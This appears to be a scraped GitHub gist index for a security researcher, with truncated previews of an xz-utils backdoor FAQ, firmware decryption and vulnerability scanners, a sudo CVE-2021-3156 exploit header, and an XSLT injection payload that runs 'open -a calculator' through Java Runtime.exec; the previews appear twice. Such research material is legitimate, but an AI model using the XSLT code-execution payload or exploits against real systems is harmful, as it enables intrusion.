swing WinMin

## xz-backdoor.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                WinMin
                / xz-backdoor.md
            
            
              Created
              March 31, 2024 07:27
                — forked from thesamesam/xz-backdoor.md
            
              
                xz-utils backdoor situation
              
          
    FAQ on the xz-utils backdoor

Background

On March 29th, 2024, a backdoor was discovered in
xz-utils, a suite of software that
gives developers lossless compression. This package is commonly used
for compressing release tarballs, software packages, kernel images,
and initramfs images. It is very widely distributed, statistically
your average Linux or macOS system will have it installed for

  
## fgt_7.4.x_rootfs_decrypt.py
import magic
import r2pipe
import hashlib
import argparse
import subprocess
from unicorn import *
from unicorn.x86_const import *
# from udbserver import *    # uncomment this line if you want to debug

def pad_size(size):

## select.xslt
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

## msl.py
#!/usr/bin/env  python3
import docker
import os
import platform
import logging
import argparse

from distutils.dir_util import mkpath


## theme.css
/* INSTALL:
 *
 * Put this file under the respective directory.
 * Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
 * Linux & MacOS: ~/.idapro/themes/monokai/theme.css
 *
 * In Options -> Colors change theme to monokai
 *
 * */
@importtheme "dark";

## CVE-2021-3156-exploit.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/*
author: swing @ bestswngs@gmail.com

swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue

## show_protocol.py
from scapy.all import *
from scapy.layers.http import *
import gdb


class ShowProcto(gdb.Command):
    """
    Usage: xpr/size memaddr procto_type
    Exaple:
    (gdb) xpr/20 0x7fffffffe238 TCP

## ripple20-treck-scan.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#author：swing
from scapy.all import *

ICMP_MS_SYNC_REQ_TYPE = 0xa5
ICMP_MS_SYNC_RSP_TYPE = 0xa6


def keep_icmp_handler(func):

## smb-cve-2020-0796-scan.py
# author: @leommxj @swing
import socket, struct, sys, time
from functools import reduce


class Smb2Header:
    def __init__(self, command, message_id):
        self.protocol_id = "\xfeSMB"
        self.structure_size = "\x40\x00"  # Must be set to 0x40
        self.credit_charge = "\x00"*2

## wslport.ps1
param($port, $op='open', $protocol='tcp')

#Remove Firewall Exception Rules
Function removeFirewall(){
    Invoke-Expression "Remove-NetFireWallRule -DisplayName 'WSL 2 Firewall Unlock *' ";
    Invoke-Expression "netsh interface portproxy reset";
}
	import magic
	import r2pipe
	import hashlib
	import argparse
	import subprocess
	from unicorn import *
	from unicorn.x86_const import *
	# from udbserver import * # uncomment this line if you want to debug

	def pad_size(size):
	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
	<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="<init>"/>
	#!/usr/bin/env python3
	import docker
	import os
	import platform
	import logging
	import argparse

	from distutils.dir_util import mkpath
	/* INSTALL:
	*
	* Put this file under the respective directory.
	* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
	* Linux & MacOS: ~/.idapro/themes/monokai/theme.css
	*
	* In Options -> Colors change theme to monokai
	*
	* */
	@importtheme "dark";
	#define _GNU_SOURCE
	#include <stdio.h>
	#include <unistd.h>
	#include <string.h>
	/*
	author: swing @ bestswngs@gmail.com

	swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
	Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
	swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
	from scapy.all import *
	from scapy.layers.http import *
	import gdb


	class ShowProcto(gdb.Command):
	"""
	Usage: xpr/size memaddr procto_type
	Exaple:
	(gdb) xpr/20 0x7fffffffe238 TCP
	#!/usr/bin/python3
	# -- coding: utf-8 --
	#author：swing
	from scapy.all import *

	ICMP_MS_SYNC_REQ_TYPE = 0xa5
	ICMP_MS_SYNC_RSP_TYPE = 0xa6


	def keep_icmp_handler(func):
	# author: @leommxj @swing
	import socket, struct, sys, time
	from functools import reduce


	class Smb2Header:
	def __init__(self, command, message_id):
	self.protocol_id = "\xfeSMB"
	self.structure_size = "\x40\x00" # Must be set to 0x40
	self.credit_charge = "\x00"*2
	param($port, $op='open', $protocol='tcp')

	#Remove Firewall Exception Rules
	Function removeFirewall(){
	Invoke-Expression "Remove-NetFireWallRule -DisplayName 'WSL 2 Firewall Unlock *' ";
	Invoke-Expression "netsh interface portproxy reset";
	}